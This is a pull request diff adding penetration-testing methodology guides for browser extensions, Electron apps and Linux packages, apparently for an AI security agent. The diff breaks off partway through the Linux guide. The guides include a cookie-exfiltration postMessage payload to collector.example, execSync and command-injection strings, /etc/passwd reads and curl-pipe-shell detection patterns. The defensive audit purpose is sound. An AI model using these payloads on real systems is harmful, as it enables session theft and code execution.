### PR TITLE
feat(skills): mobile & desktop asset methodology skills

### DIFF
--- a/strix/skills/desktop/browser_extension.md
+++ b/strix/skills/desktop/browser_extension.md
@@ -1,0 +1,174 @@
+---
+name: browser_extension
+description: Browser extension assessment via manifest, permissions, content scripts, and message-passing analysis to find privilege escalation and data exfiltration.
+---
+
+# Browser Extension
+
+A browser extension is a signed bundle (a `.crx`/`.xpi`/`.zip`, or an unpacked directory) of HTML, JS, CSS, and a `manifest.json` that runs with elevated privileges inside Chrome/Edge/Firefox. Extensions straddle two trust boundaries: untrusted web page content on one side and privileged browser APIs (cookies, tabs, webRequest, native messaging, `<all_urls>`) on the other. The attacker objective is to cross that boundary — get a malicious web page, a compromised dependency, or a crafted message to run with extension privileges and reach cookies, history, downloads, the file system, or arbitrary host data. You are auditing the static bundle plus its runtime message paths, not a network service.
+
+## Attack Surface
+
+**Trust boundaries (where privilege is crossed)**
+- Web page DOM ↔ content script (shared DOM, isolated JS worlds, but the page controls the DOM the content script reads)
+- Content script ↔ background/service worker (`chrome.runtime.sendMessage`, `connect`/`Port`)
+- Any web origin ↔ extension (`externally_connectable`, `chrome.runtime.onMessageExternal`)
+- Extension ↔ native host binary (`nativeMessaging`, stdin/stdout JSON to a local executable)
+- Extension pages ↔ web (`web_accessible_resources` expose extension files to page origins)
+- DevTools/sidepanel/options/popup pages ↔ background
+
+**High-value capabilities to enumerate (manifest permissions)**
+- `<all_urls>` / broad `host_permissions` — read/modify any site, steal cookies/session
+- `cookies`, `webRequest`/`webRequestBlocking`, `proxy`, `tabs`, `history`, `bookmarks`, `downloads`
+- `nativeMessaging` — bridge to a local binary (RCE pivot)
+- `debugger` — attach Chrome DevTools Protocol to any tab (full page control)
+- `scripting`/`tabs.executeScript`, `declarativeNetRequest`, `clipboardRead`, `management`
+
+**Code sinks inside the bundle**
+- `eval`, `new Function`, `setTimeout("string")`, `chrome.tabs.executeScript({code:...})`
+- `innerHTML`/`outerHTML`/`insertAdjacentHTML`/`document.write` in content/extension pages
+- `postMessage` handlers without `origin` checks; `JSON.parse` of attacker data into a DOM sink
+- `fetch`/`XMLHttpRequest` to hardcoded C2-style or analytics endpoints; remote-hosted code (`importScripts`, remote `<script>`)
+
+## Recon & Enumeration
+
+```bash
+# --- Acquire and unpack the bundle ---
+# CRX/XPI/ZIP are all ZIP containers (CRX has a header before the ZIP; unzip skips it)
+unzip -o extension.crx -d ext_src 2>/dev/null || \
+  binwalk --dd='zip:zip' extension.crx && unzip -o *.zip -d ext_src
+unzip -o extension.xpi -d ext_src        # Firefox
+
+# Pull a Chrome extension straight from the Web Store by ID
+EXT_ID=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
+curl -sL "https://clients2.google.com/service/update2/crx?response=redirect&prodversion=120&acceptformat=crx2,crx3&x=id%3D${EXT_ID}%26uc" -o extension.crx
+
+# --- Manifest first: version, permissions, sinks, entry points ---
+jq '{mv:.manifest_version, perms:.permissions, host:.host_permissions, opt:.optional_permissions,
+     ext_conn:.externally_connectable, war:.web_accessible_resources, csp:.content_security_policy,
+     bg:.background, cs:.content_scripts, nm:(.permissions|index("nativeMessaging"))}' ext_src/manifest.json
+
+# --- Beautify minified/bundled JS so static analysis sees the real code ---
+find ext_src -name '*.js' -exec npx --yes js-beautify -r {} \; 2>/dev/null
+# Source maps often ship by accident — reconstruct original sources if present:
+find ext_src -name '*.map' -exec npx --yes source-map-cli {} \; 2>/dev/null
+
+# --- Grep the dangerous sinks and capability calls ---
+grep -rnE "eval\(|new Function|setTimeout\(['\"]|executeScript|innerHTML|insertAdjacentHTML|document\.write|importScripts" ext_src
+grep -rnE "onMessage(External)?|sendMessage|runtime\.connect|addEventListener\(['\"]message" ext_src
+grep -rnE "chrome\.(cookies|tabs|debugger|proxy|webRequest|downloads|scripting)|nativeMessaging" ext_src
+
+# --- Secrets, keys, and embedded endpoints ---
+trufflehog filesystem ext_src --only-verified --json
+gitleaks detect --no-git --source ext_src -f json -r gitleaks.json
+grep -rnoE "https?://[a-zA-Z0-9./_-]+" ext_src | sort -u        # exfil/C2/remote-code hosts
+
+# --- SAST: extension-aware rules + JS injection rules ---
+semgrep --config p/javascript --config p/xss --config p/secrets ext_src
+semgrep --config "r/javascript.browser-extension" ext_src 2>/dev/null
+
+# --- Dependency / supply-chain hygiene of the bundled libs ---
+# If node_modules or a lockfile shipped, scan it; otherwise fingerprint vendored libs by hash/version string
+trivy fs --scanners vuln,secret ext_src
+grep -rhoE "/\*!? *[A-Za-z0-9._-]+ v?[0-9]+\.[0-9]+\.[0-9]+" ext_src | sort -u   # vendored lib versions -> CVE lookup
+
+# --- For nativeMessaging hosts: locate the manifest + binary the extension talks to ---
+ls ~/.config/google-chrome/NativeMessagingHosts/ /etc/opt/chrome/native-messaging-hosts/ 2>/dev/null
+jq '{name,path,type,allowed_origins}' /etc/opt/chrome/native-messaging-hosts/*.json 2>/dev/null
+```
+
+Install/asset-specific tools if not already present:
+- `npm i -g js-beautify source-map-cli` (deobfuscate/unbundle)
+- `pip install crxcavator` or use the open `crxcavator`/`ext-analysis` rulesets for risk scoring
+- `apt-get install -y binwalk` (carve nested ZIPs from CRX), `unzip`, `jq`
+- Use Chrome with `--load-extension=$PWD/ext_src --user-data-dir=/tmp/ext_profile` for live runtime testing (see `agent_browser` skill).
+
+## Methodology
+
+1. **Acquire and normalize.** Unpack the CRX/XPI/ZIP, beautify all JS, recover any `.map` sources. Note `manifest_version` (MV2 vs MV3 changes the threat model: MV2 has persistent background pages + remote code + blocking `webRequest`; MV3 forces a service worker and `declarativeNetRequest`).
+2. **Manifest threat model.** Inventory every permission and host pattern. Flag the over-broad set (`<all_urls>`, `cookies`, `nativeMessaging`, `debugger`, `proxy`, blocking `webRequest`). For each, find the code that uses it — unused dangerous permissions are still attack surface if an XSS lands inside the extension.
+3. **Map message paths.** Build a graph: which web origins can reach the extension (`externally_connectable`, `onMessageExternal`), which content scripts post to the background, what the background does with each message `type`. The privilege boundary is crossed wherever attacker-controlled data reaches a privileged `chrome.*` call.
+4. **CSP & remote code review.** Read `content_security_policy`. Look for `unsafe-eval`, `unsafe-inline`, wildcard `script-src`, or remote `script-src` hosts that allow loading attacker-controlled code into the extension context.
+5. **Sink analysis in each context.** Separately audit content scripts (page-DOM-adjacent), extension pages (popup/options/background, extension origin), and `web_accessible_resources` (page-reachable). DOM-XSS in an extension page runs with full extension privileges; in a content script it runs in the isolated world but still controls the page.
+6. **`web_accessible_resources` exposure.** List every WAR entry. Each is fetchable/embeddable by web pages — check for resources that leak data, accept query params into sinks, or enable fingerprinting (`web_accessible_resources` with `<all_urls>` matches).
+7. **Native messaging chain.** If `nativeMessaging` is present, locate the host manifest, its `allowed_origins`, and the target binary. Audit how the binary parses extension JSON (command injection, path traversal, deserialization) — this is the RCE pivot.
+8. **Runtime validation.** Load the unpacked extension in a disposable Chrome profile, open a page you control, and fire crafted messages / `postMessage` / page-DOM payloads to confirm the static findings reach the privileged calls.
+
+## Key Weaknesses / Techniques
+
+**Unauthenticated/over-permissive message handlers.** A background handler that trusts any message without verifying `sender`:
+```js
+// vulnerable: no sender check, reflects into a privileged sink
+chrome.runtime.onMessageExternal.addListener((msg, sender, sendResponse) => {
+  if (msg.action === 'exec') chrome.tabs.executeScript({ code: msg.code });   // any web origin -> code in any tab
+});
+```
+Assess by sending from a page you control (works only if `externally_connectable.matches` includes your origin, or is missing — which in MV2 defaults to all):
+```js
+chrome.runtime.sendMessage("EXTENSION_ID_HERE", { action: "exec", code: "document.title" }, r => console.log(r));
+```
+
+**Missing `postMessage`/`window` message origin checks.** Content scripts that listen on the page and forward to the background without `event.origin`/`event.source` validation let any iframe or page script drive extension privileges:
+```js
+window.addEventListener('message', e => chrome.runtime.sendMessage({ url: e.data.url }));  // no origin check
+```
+Payload from the page: `window.postMessage({url:'https://collector.example/'+document.cookie}, '*')`.
+
+**DOM-XSS in extension pages → privileged JS execution.** `innerHTML` of attacker data in the options/popup/background page runs in the extension origin (can call any granted `chrome.*`). Confirm with a benign marker payload:
+```html
+<img src=x onerror="chrome.cookies&&console.log('priv-context-confirmed')">
+```
+
+**Weak/over-broad CSP allowing remote or inline code.** `"content_security_policy": "script-src 'self' 'unsafe-eval' https://*; object-src 'self'"` lets a single injected string become code execution in the extension. Combined with a DOM sink, this is full-privilege XSS.
+
+**`web_accessible_resources` data leak / clickjacking.** A WAR HTML page that reads `location.hash`/query into `innerHTML` is XSS reachable from any web page that frames `chrome-extension://ID/page.html#payload`.
+
+**Native messaging command/argument injection.** Extension forwards page-controlled strings to a host binary that shells out:
+```python
+# host binary (vulnerable): builds a shell command from extension input
+subprocess.run("convert " + msg["file"], shell=True)   # msg.file = "x; id > /tmp/pwn"
+```
+This turns an extension-context compromise into local RCE.
+
+**Hardcoded secrets / silent exfiltration / remote code.** API keys, OAuth secrets, or analytics tokens in the bundle; `importScripts('https://cdn.attacker/runtime.js')` or appended `<script src=remote>` that pulls updatable code outside store review.
+
+**`declarativeNetRequest`/`webRequest` abuse.** Rules that rewrite requests, strip CSP/`X-Frame-Options`, inject headers, or redirect auth endpoints — verify the rule set isn't downgrading the security of pages it touches.
+
+## Validation
+
+1. **Static-to-runtime link.** For each finding, show the exact line where attacker-controlled data enters and the exact privileged `chrome.*` call it reaches. A finding is real only when both endpoints are reachable from a non-extension origin (web page, arbitrary message sender, native host).
+2. **Reproduce in a sandbox profile.** Load the unpacked source: `google-chrome --load-extension=$PWD/ext_src --user-data-dir=/tmp/ext_profile --no-first-run`. Note the assigned extension ID from `chrome://extensions`.
+3. **Drive the boundary.** From a page you serve locally (`python3 -m http.server`), send the crafted message / `postMessage` / WAR-frame payload and observe the privileged effect (a cookie read, a tab script execution, an outbound `fetch`) in the background service worker console and DevTools Network tab.
+4. **Benign PoC only.** Demonstrate impact with a harmless marker: read `document.title` or a single non-sensitive cookie name, or trigger one OAST callback for exfil — `interactsh-client` gives a `*.oast.fun` domain; inject it as the exfil URL and confirm the inbound hit, then stop.
+5. **Native messaging PoC.** If proving host RCE, use an innocuous command (`id > /tmp/poc_marker`) and capture the file as evidence rather than anything destructive.
+
+## False Positives
+
+- Dangerous permission declared but no code path uses it (still note as least-privilege violation, but not exploitable on its own).
+- `onMessage` handlers that strictly validate `sender.id`/`sender.origin` and reject unknown senders — message injection blocked.
+- `externally_connectable.matches` scoped to a specific first-party origin you do not control — external messaging not attacker-reachable.
+- `innerHTML` of static, developer-controlled strings or values already passed through `DOMPurify`/`textContent`.
+- `eval`/`new Function` confined to bundler runtime shims (webpack `__webpack_require__`) operating on constant module maps, not external input.
+- Secrets that are public client identifiers (e.g., OAuth client IDs, public Sentry DSNs) rather than true secrets — verify the key class before reporting.
+- Content-script DOM-XSS where the injected code runs only in the isolated world with no granted privileges and no message path to the background — limited to page-level impact already available to the page.
+
+## Chaining & Impact
+
+- Web-page → unauthenticated message handler → `cookies`/`tabs` permission = **session theft across every site the user visits**.
+- DOM-XSS in extension page + permissive CSP → code in extension origin → `chrome.tabs.executeScript`/`scripting` = **universal page injection** (read/modify any open tab, harvest credentials).
+- External message → `nativeMessaging` → host binary command injection = **browser-to-local RCE** on the user's machine.
+- `debugger` permission abuse → attach CDP to any tab → **full DOM/network control, bypass of site CSP**.
+- `webRequest`/`declarativeNetRequest` rule injection → strip CSP/CORS, redirect OAuth → **token interception and MITM** within the browser.
+- Supply-chain: compromised bundled dependency or remote-code endpoint → silent update of millions of installs → **mass credential/data exfiltration**.
+
+## Pro Tips
+
+1. Read the manifest before any JS. Permissions tell you the maximum blast radius; the JS just tells you which paths reach it.
+2. MV2 `externally_connectable` is permissive by default — absence of the key in MV2 means any origin may message the extension. MV3 tightens this; always confirm the actual `manifest_version`.
+3. Beautify and unbundle first. Webpack/rollup output hides the real handlers; ship `.map` files reconstruct original variable names and make sinks obvious.
+4. The most valuable bug is the shortest path from a web origin to a privileged `chrome.*` call — trace messages backward from each `chrome.cookies`/`executeScript`/`nativeMessaging` call to its data source.
+5. Isolated worlds protect JS, not the DOM: a content script reading the page DOM is reading attacker-controlled data even though page scripts can't touch the content script's variables.
+6. `web_accessible_resources` is an under-tested surface — any listed file is a web-reachable extension-origin page; check every one for hash/query sinks and data leaks.
+7. Check `optional_permissions` and runtime `chrome.permissions.request` — an extension may escalate quietly after install.
+8. For native messaging, the host manifest's `allowed_origins` is the only auth between the page and a local binary; a wildcard or wrong extension ID there is critical.
+9. Compare store version vs the bundle on disk — sideloaded/updated-out-of-band code that differs from the reviewed listing is a strong tampering signal.

--- a/strix/skills/desktop/electron_app.md
+++ b/strix/skills/desktop/electron_app.md
@@ -1,0 +1,160 @@
+---
+name: electron_app
+description: Electron desktop app testing — unpack ASAR, assess nodeIntegration/contextIsolation, IPC, preload bridges, and custom protocol handlers.
+---
+
+# Electron Desktop App
+
+An Electron app ships a full Chromium renderer plus a Node.js main process bundled with the application's JavaScript, usually packed into an `app.asar` archive inside the installer. The attacker's objective is to turn renderer-controlled input (untrusted web content, deep links, loaded files, IPC messages) into Node.js execution in the main or a privileged renderer process, then into local command execution, file read/write, secret theft, or persistence. The whole client is shippable to disk, so source, config, and embedded secrets are recoverable — treat the binary as readable source.
+
+## Attack Surface
+
+**Bundled code & config**
+- `app.asar` (and `app.asar.unpacked/`) — full application JS, HTML, templates
+- `package.json` main entry, `electronVersion`, fuses, build config (electron-builder/forge)
+- Embedded API keys, signing tokens, update URLs, hardcoded creds
+
+**Renderer trust boundary**
+- `BrowserWindow` `webPreferences`: `nodeIntegration`, `contextIsolation`, `sandbox`, `webSecurity`, `allowRunningInsecureContent`, `enableRemoteModule`
+- Preload scripts and the `contextBridge` API exposed to web content
+- `<webview>`/`<iframe>` tags loading remote or attacker-influenced origins
+- `window.open`, `webContents.setWindowOpenHandler`, `will-navigate` handling
+
+**IPC**
+- `ipcMain.handle`/`ipcMain.on` channels and what arguments they trust
+- `ipcRenderer.invoke`/`send` wrappers leaked through the bridge
+- Sender validation (does the handler check `event.senderFrame`/origin?)
+
+**External input vectors**
+- Custom protocol handlers (`app.setAsDefaultProtocolClient`, `protocol.registerFileProtocol`) and `deeplink://` / `myapp://` URIs
+- Files opened by the app (project files, config import, drag-and-drop)
+- Auto-update channel (electron-updater feed URL, signature checks)
+- Remote content loaded into windows/webviews
+
+## Recon & Enumeration
+
+Locate and unpack the archive. `asar` runs via `npx` (Node is in the sandbox):
+```bash
+# find the packaged archive in an installed app / extracted installer
+find / -name "app.asar" 2>/dev/null
+# unpack
+npx -y @electron/asar extract app.asar app_src
+npx -y @electron/asar list app.asar | head
+# unpacked native modules sit alongside
+ls -R app.asar.unpacked 2>/dev/null
+```
+Determine Electron version and fuse config (drives which CVEs and hardening apply):
+```bash
+grep -aoiE 'electron[/ ]?v?[0-9]+\.[0-9]+\.[0-9]+' app_src/package.json
+# inspect fuses (RunAsNode, EnableNodeCliInspect, EnableNodeOptions, OnlyLoadAppFromAsar, ...)
+npx -y @electron/fuses read --app /path/to/App.app   # or the unpacked binary
+```
+Map the dangerous config and sinks with grep / Semgrep:
+```bash
+cd app_src
+grep -rniE 'nodeIntegration|contextIsolation|sandbox|webSecurity|allowRunningInsecureContent|enableRemoteModule' .
+grep -rniE 'ipcMain\.(handle|on)|ipcRenderer\.(invoke|send)|contextBridge\.exposeInMainWorld' .
+grep -rniE 'setAsDefaultProtocolClient|registerFileProtocol|registerStringProtocol|setWindowOpenHandler|will-navigate|new-window' .
+grep -rniE 'child_process|exec\(|execSync|spawn|eval\(|new Function|loadURL|loadFile|shell\.openExternal|shell\.openPath' .
+semgrep --config p/electronjs --config p/javascript . 2>/dev/null
+```
+Recover secrets and dependency CVEs:
+```bash
+trufflehog filesystem app_src --only-verified
+gitleaks detect --source app_src --no-git -v
+# bundled node_modules vulns
+trivy fs --scanners vuln app_src 2>/dev/null
+# or, if a lockfile survives
+( cd app_src && npm audit --omit=dev ) 2>/dev/null
+```
+If the app exposes a local HTTP/WebSocket service or an update feed, enumerate it:
+```bash
+ss -ltnp        # local listeners the app opened (devtools 9222, IPC ws, license server)
+nmap -sT -p 9222,17000-17100 127.0.0.1
+httpx -u http://127.0.0.1:<port> -title -tech-detect
+nuclei -u http://127.0.0.1:<port> -tags electron,exposure,debug -s critical,high -silent
+```
+For binary-only or obfuscated bundles, fall back to `strings app.asar | grep -iE 'http|api|secret|token'` and `binwalk` on the installer (`apt-get install -y binwalk`).
+
+## Methodology
+
+1. **Acquire and unpack.** Extract `app.asar` + `app.asar.unpacked`, read `package.json` to find the main entry point and Electron version.
+2. **Read the fuses.** RunAsNode/EnableNodeOptions/EnableNodeCliInspect left on means `ELECTRON_RUN_AS_NODE` or `--inspect` turns the signed binary into an arbitrary Node interpreter — note for chaining.
+3. **Inventory windows.** For every `new BrowserWindow(...)` / `<webview>`, record `webPreferences` and what URL/file it loads. Flag any window with `nodeIntegration:true` or `contextIsolation:false` that ever loads remote or attacker-influenced content.
+4. **Map the bridge.** Read all `contextBridge.exposeInMainWorld` calls; treat every exposed function as renderer-reachable. Trace each to its `ipcRenderer.invoke`/`send` and the matching `ipcMain` handler.
+5. **Audit IPC handlers.** For each handler, check argument validation and sender checks. Look for handlers that pass args to `child_process`, `fs`, `shell.*`, `eval`, dynamic `require`, or SQL.
+6. **Trace external input.** Follow protocol-handler args, opened-file contents, and deep-link parameters into the renderer/main; check for DOM XSS sinks and command/path construction.
+7. **Reach a Node primitive.** Establish whether renderer-side script (XSS or loaded remote content) can reach Node — directly (nodeIntegration) or indirectly (an over-broad bridge/IPC method).
+8. **Build a PoC and assess impact.** Demonstrate a benign command run, a file read outside the app dir, or secret retrieval, then document the full chain.
+
+## Key Weaknesses / Techniques
+
+**nodeIntegration on untrusted content** — if a window has `nodeIntegration:true` (and old default `contextIsolation:false`) and renders content you can influence (remote page, markdown preview, injected DOM), `require` is reachable. Validate with a contained payload in an injectable field/page:
+```html
+<img src=x onerror="window.top.require('child_process').execSync('id > /tmp/poc_e.txt')">
+```
+
+**contextIsolation disabled** — even without `nodeIntegration`, a disabled `contextIsolation` lets renderer script reach preload internals and prototype-pollute the bridge. Assess by checking whether `require`/`process`/`global` are reachable from `window`.
+
+**Over-permissive contextBridge / IPC** — the safe config is `nodeIntegration:false`, `contextIsolation:true`, `sandbox:true`, but a bridge that exposes a generic primitive defeats it. Hunt for exposed `invoke('exec', cmd)`, `readFile(path)`, `openExternal(url)`, or `ipcRenderer` passed through verbatim. From a renderer console / injected script:
+```js
+// enumerate what the bridge leaks
+Object.keys(window).filter(k => typeof window[k] === 'object')
+window.electronAPI && Object.keys(window.electronAPI)
+// abuse an over-broad file/exec method
+await window.electronAPI.runCommand('id')           // command sink
+await window.electronAPI.readFile('/etc/passwd')    // arbitrary read sink
+```
+
+**Missing IPC sender validation** — `ipcMain.handle('run', (e,c)=>exec(c))` with no `event.senderFrame` origin check is callable by any frame, including a hostile iframe/webview. Confirm the handler does not verify the sender's URL/frame.
+
+**Command/path injection in handlers** — args concatenated into `exec`/`spawn` or `path.join` without sanitization. Test with `;id`, `$(id)`, `` `id` ``, and `../../../../etc/passwd` style traversal through the IPC method.
+
+**shell.openExternal / openPath with attacker URLs** — `openExternal` on an unvalidated string allows `file:`, `smb:`, or app-specific schemes that launch local programs; on Windows historically reaches arbitrary executables. Verify the app validates the scheme against an allowlist.
+
+**Custom protocol handler abuse** — `myapp://` deep links are parsed and routed; if a parameter feeds navigation, IPC, or a command, a malicious link delivered via browser/email is remote-triggerable. Map the handler then craft a link, e.g. `myapp://open?file=../../sensitive` or one that drives a privileged IPC call.
+
+**Insecure window/navigation handling** — no `setWindowOpenHandler` deny and no `will-navigate` guard lets loaded content navigate the main window to attacker origins, re-acquiring any leftover Node privileges. `webSecurity:false` or `allowRunningInsecureContent:true` compounds this.
+
+**Insecure auto-update** — an `electron-updater` feed over HTTP, or one without signature verification, allows update-channel takeover and code execution. Check the feed URL scheme and whether `verifySignature`/code-signing is enforced.
+
+**Exposed remote debugging** — a window or build started with `--remote-debugging-port` (or `--inspect`) exposes a DevTools/CDP endpoint on `127.0.0.1:9222` allowing `Runtime.evaluate` in the privileged context.
+
+**Known CVEs** — old Electron carries renderer-to-main escapes (e.g. `nodeIntegrationInSubFrames`, ASAR integrity bypasses, `shell.openExternal` argument-injection CVEs). Cross-reference the detected version.
+
+## Validation
+
+- Reproduce the chain end to end: untrusted input source → reachable Node primitive → observable effect. A real finding has a concrete entry point, not just a risky config line.
+- Use a benign, contained PoC: write a marker file (`id > /tmp/poc_e.txt`) or read a known non-secret file, and capture the output. Prefer effects you can clean up.
+- For IPC/bridge issues, drive the call from a renderer context that an attacker actually controls (injected DOM, loaded remote page, hostile iframe) — not from your own injected `<script>` in a trusted local page that wouldn't exist in the real flow.
+- For protocol handlers, trigger via the OS URL dispatcher (`xdg-open 'myapp://...'`) to prove the link is remotely deliverable, not just internally callable.
+- Confirm `webPreferences` at runtime, not only in source — build flags or runtime overrides can differ.
+
+## False Positives
+
+- `nodeIntegration:true` on a window that only ever loads trusted, bundled local HTML with no injection sink and no remote/loaded content — no untrusted input reaches it.
+- A `contextBridge` that exposes only narrow, validated functions (fixed channel names, type-checked args, no arbitrary path/command) — exposure alone is not a vuln.
+- Secrets that are public client config (analytics keys, OAuth public client IDs) rather than server-side credentials.
+- `child_process`/`exec` used only with hardcoded, non-attacker-influenced arguments.
+- `npm audit`/`trivy` CVEs in transitive dev or unused modules not present at runtime — confirm the vulnerable path is actually reachable.
+- DevTools open in a dev build; verify against the shipped production build.
+
+## Chaining & Impact
+
+- Renderer XSS (or loaded remote content) + `nodeIntegration`/leaky bridge → `child_process` → local code execution as the user.
+- Over-broad IPC file read → exfiltrate `~/.ssh`, browser cookies, tokens stored in app data → account/host compromise.
+- Deep-link/protocol handler → privileged IPC call → command execution, all triggerable from a web page or email (drive-by on a desktop target).
+- Left-on `RunAsNode`/`EnableNodeOptions` fuse → use the signed, trusted binary as a Node interpreter (`ELECTRON_RUN_AS_NODE=1 ./App -e '...'`) for execution and AV/allowlist evasion / persistence.
+- Insecure auto-update feed → push a malicious update → persistent RCE across the install base.
+- Exposed CDP/`--inspect` port → `Runtime.evaluate` in main process → full Node capabilities without any in-app bug.
+
+## Pro Tips
+
+- Always read the fuses, not just `webPreferences`. A perfectly hardened renderer is moot if `RunAsNode`/`EnableNodeCliInspect` is enabled.
+- `contextIsolation:true` is only effective with a correctly written preload; a preload that stuffs raw `ipcRenderer` or Node objects onto `window` silently reintroduces the bridge — read the preload, don't trust the flag.
+- Distinguish "can be called" from "attacker can reach it": a dangerous IPC handler matters only if some untrusted frame/content can invoke it. Map the actual reachability path.
+- Deminify with a beautifier (`npx prettier`/`js-beautify`) before auditing bundled `main.js`; webpack output hides handler logic.
+- Check `app.asar.unpacked` and any native `.node` addons — sensitive logic is often pushed out of the archive and is easier to inspect.
+- `event.senderFrame.url` checks are the modern fix for IPC; their absence in a handler that hits a dangerous sink is a strong lead.
+- Test deep links by actually registering/triggering them through the OS so you prove remote deliverability, the difference between a theoretical and a reportable finding.
+- The shipped binary is the source of truth — config in source can be overridden at build time, so verify the live process where possible.

--- a/strix/skills/desktop/linux_package.md
+++ b/strix/skills/desktop/linux_package.md
@@ -1,0 +1,176 @@
+---
+name: linux_package
+description: Assessing Linux binaries and packages for malicious/insecure install scripts, unsafe binaries, and bundled dependency CVEs
+---
+
+# Linux Binary / Package
+
+A distributable Linux artifact: a `.deb`/`.rpm`/`.apk` package, a tarball/AppImage/Snap/Flatpak bundle, or a standalone ELF binary. The attacker objective is to find code that runs with elevated privilege during install/upgrade/remove, ELF binaries shipped with exploitable memory-safety or logic flaws, hardcoded secrets, world-writable or setuid drops, and vulnerable third-party libraries vendored or declared as dependencies. Packages are trusted by root at install time and frequently by services at runtime, so a single unsafe maintainer script or a bundled CVE becomes local privilege escalation, supply-chain compromise, or RCE.
+
+## Attack Surface
+
+**Package metadata & scripts**
+- Maintainer scripts run as root: deb `preinst`/`postinst`/`prerm`/`postrm`, rpm `%pre`/`%post`/`%preun`/`%postun`/`%posttrans`/`%trigger*`, apk `.pre-install`/`.post-install`
+- Declared dependencies and pinned versions (CVE-bearing transitive deps)
+- File manifest: install paths, ownership, and permission bits (setuid/setgid, world-writable, dirs under `$PATH`)
+- Signing/trust: GPG signature presence, repo `Release`/`repomd.xml` integrity
+
+**Shipped binaries**
+- ELF executables and shared objects: hardening flags, RPATH/RUNPATH, symbol exports
+- setuid/setgid binaries and capabilities (`getcap`) installed by the package
+- systemd units, init scripts, cron entries, polkit policies, sudoers drop-ins, udev rules the package installs
+
+**Bundled / vendored code**
+- Statically linked or vendored libraries (often outdated)
+- Interpreted payloads inside the package (python/perl/node/shell helpers)
+- Embedded archives, firmware blobs, and config with credentials
+
+## Recon & Enumeration
+
+Install asset-specific tooling not present in the Kali base:
+
+```bash
+# SBOM + vuln scanning
+curl -sSfL https://raw.githubusercontent.com/anchore/syft/main/install.sh  | sh -s -- -b /usr/local/bin
+curl -sSfL https://raw.githubusercontent.com/anchore/grype/main/install.sh | sh -s -- -b /usr/local/bin
+apt-get install -y trivy 2>/dev/null || \
+  curl -sSfL https://raw.githubusercontent.com/aquasecurity/trivy/main/contrib/install.sh | sh -s -- -b /usr/local/bin
+# Firmware/blob carving, RPM handling, hardening checks
+apt-get install -y binwalk rpm2cpio cpio checksec yara radare2
+pip install -q capa-explorer 2>/dev/null || true   # optional: capability matching for ELF
+```
+
+Unpack without executing anything:
+
+```bash
+file ./artifact.*                                   # confirm type before touching it
+# .deb: extract data + control without running scripts
+dpkg-deb -R package.deb /tmp/pkg                     # -R keeps control/ scripts intact for review
+ar t package.deb && ar x package.deb                 # raw members: control.tar.*, data.tar.*
+# .rpm: convert to cpio, never rpm -i in a host you care about
+rpm2cpio package.rpm | cpio -idmv -D /tmp/rpm
+rpm -qp --scripts package.rpm                        # dump %pre/%post without installing
+rpm -qp --requires package.rpm                       # declared deps
+# AppImage / self-extracting
+./app.AppImage --appimage-extract                    # -> squashfs-root/
+unsquashfs -d /tmp/snap snap.snap                    # snaps are squashfs
+# tarball
+tar tzvf bundle.tar.gz                               # list perms/owners before extracting
+```
+
+SBOM and dependency-CVE pass over the unpacked tree or the artifact directly:
+
+```bash
+syft package.deb -o cyclonedx-json=sbom.json -o table
+grype sbom:sbom.json --fail-on high                  # CVE match against the SBOM
+trivy fs --scanners vuln,secret,misconfig /tmp/pkg   # also catches embedded secrets/IaC
+trivy rootfs squashfs-root/                           # for AppImage/Snap roots
+```
+
+Static review of scripts, binaries, and secrets:
+
+```bash
+semgrep --config p/bash --config p/command-injection /tmp/pkg          # maintainer-script flaws
+trufflehog filesystem /tmp/pkg --only-verified                          # live credentials
+gitleaks dir /tmp/pkg -v                                                # broader secret patterns
+grep -rEn 'curl .*\| *(sudo )?(ba)?sh|wget .*-O- *\| *sh|eval \$' /tmp/pkg/control* /tmp/pkg/DEBIAN 2>/dev/null
+```
+
+ELF triage on each shipped binary:
+
+```bash
+checksec --file=/tmp/pkg/usr/bin/svc                 # RELRO/NX/PIE/Canary/RPATH/Fortify
+readelf -d /tmp/pkg/usr/bin/svc | grep -E 'RPATH|RUNPATH'   # writable-dir hijack candidates
+objdump -d /tmp/pkg/usr/bin/svc | grep -E 'system|popen|execve|strcpy|sprintf|gets'
+strings -n8 /tmp/pkg/usr/bin/svc | grep -Ei 'password|secret|token|api[_-]?key|http://'
+nm -D /tmp/pkg/usr/lib/*.so 2>/dev/null              # exported symbols / version pinning
+find /tmp/pkg -perm -4000 -o -perm -2000 -o -perm -0002 2>/dev/null    # setuid/setgid/world-writable
+getcap -r /tmp/pkg 2>/dev/null                       # file capabilities
+r2 -A -q -c 'afl;/c system' /tmp/pkg/usr/bin/svc     # quick call-graph + xrefs to system()
+```
+
+If the package self-updates or fetches at install/runtime, capture egress:
+
+```bash
+interactsh-client -v        # seed an OAST host into any URL the scripts/binary contact
+```
+
+## Methodology
+
+1. **Identify and freeze.** `file` the artifact, record sha256, and unpack with extract-only tooling (`dpkg-deb -R`, `rpm2cpio | cpio`, `--appimage-extract`, `unsquashfs`). Never run `dpkg -i`/`rpm -i`/the AppImage on a trusted host — do all execution in the disposable sandbox.
+2. **Read maintainer scripts as root code.** Dump every install/upgrade/remove hook. Trace each external command, every variable expanded into a shell command, every path written, and any network fetch piped to a shell.
+3. **Audit the file manifest.** Map install paths, owners, and mode bits. Flag setuid/setgid binaries, world-writable files/dirs, files dropped into `$PATH` or `/etc/{cron.d,sudoers.d,profile.d}`, and units/timers that run as root.
+4. **Generate an SBOM and match CVEs.** `syft` → `grype`/`trivy` over the package and unpacked root. Separate truly-reachable bundled libs from inert duplicates.
+5. **Triage shipped ELF binaries.** Hardening flags, RPATH/RUNPATH, dangerous imports, embedded secrets, and reachable `system`/`exec` sinks via radare2.
+6. **Hunt secrets and trust gaps.** trufflehog/gitleaks/trivy over the tree; check signature presence and repo metadata integrity.
+7. **Model install + runtime contexts.** Decide whether each finding triggers at install (root), upgrade, or service runtime, and under whose UID.
+8. **Validate with a minimal PoC** in the sandbox; confirm UID, the exact trigger, and reproducibility. Stop at proof of access.
+
+## Key Weaknesses / Techniques
+
+**Command injection / unsafe shell in maintainer scripts (root-context).** Scripts that interpolate package-controlled or environment values into shell, or `eval` attacker-influenced data:
+```bash
+# vulnerable postinst pattern (runs as root at install)
+NAME=$(cat /etc/myapp/instance)        # attacker-writable file
+useradd "$svc_$NAME"                    # unquoted, expandable -> injection on upgrade
+```
+Assess by reviewing every expansion and testing in the sandbox with a crafted input file/env var. Also flag `curl ... | sh` install-time fetches (network attacker controls the payload).
+
